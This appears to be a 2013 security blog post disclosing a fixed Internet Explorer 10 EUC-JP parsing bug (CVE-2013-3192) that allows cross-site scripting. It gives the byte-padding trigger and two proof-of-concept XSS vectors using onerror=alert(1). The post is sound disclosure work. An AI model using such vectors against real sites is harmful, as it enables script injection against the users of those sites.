Friday, August 16, 2013

UXSS – Internet Explorer EUC-JP Parsing Bug

While I was using shazzer, one
vector had a really weird result. The vector was: <img
src=x *chr*> onerror=alert(1)>;The result said that in Internet
Explorer 10, a certain character in the euc-jp charset consumed the
>, which lead to the execution of the onerror event handler but viewing the
test case resulted in no code execution. After retesting the vector,
there were either no results or different characters got detected, but still no
test case worked.I assumed that shazzer
worked correctly, but certain parameters were different between show test case
and the real fuzzing process.After creating a little
fuzzing script, I finally found out that a certain amount of characters have to
be before the starter byte 0x8F. The document has to look like this (charset
must be euc-jp):4094 Bytes + 0x8F +
characters that “disappears”. (4094+1 = 0xfff)After knowing how to
trigger the bug, I found out that not only > gets consumed, it seems like
every char gets consumed. This is especially usefully to consume the “.A vector could look like
this: [4076*A]<img src="x" alt="[0x8F]" test="
onerror=alert(1)//">Because the " will be
consumed, the onerror event will execute.This parsing bug enables
XSS on websites, which use the euc-jp charset, to attack Internet Explorer
users even when the site has no XSS vulnerability.
Reported: 27.5.2013
Fixed: 14.8.2013
CVE-2013-3192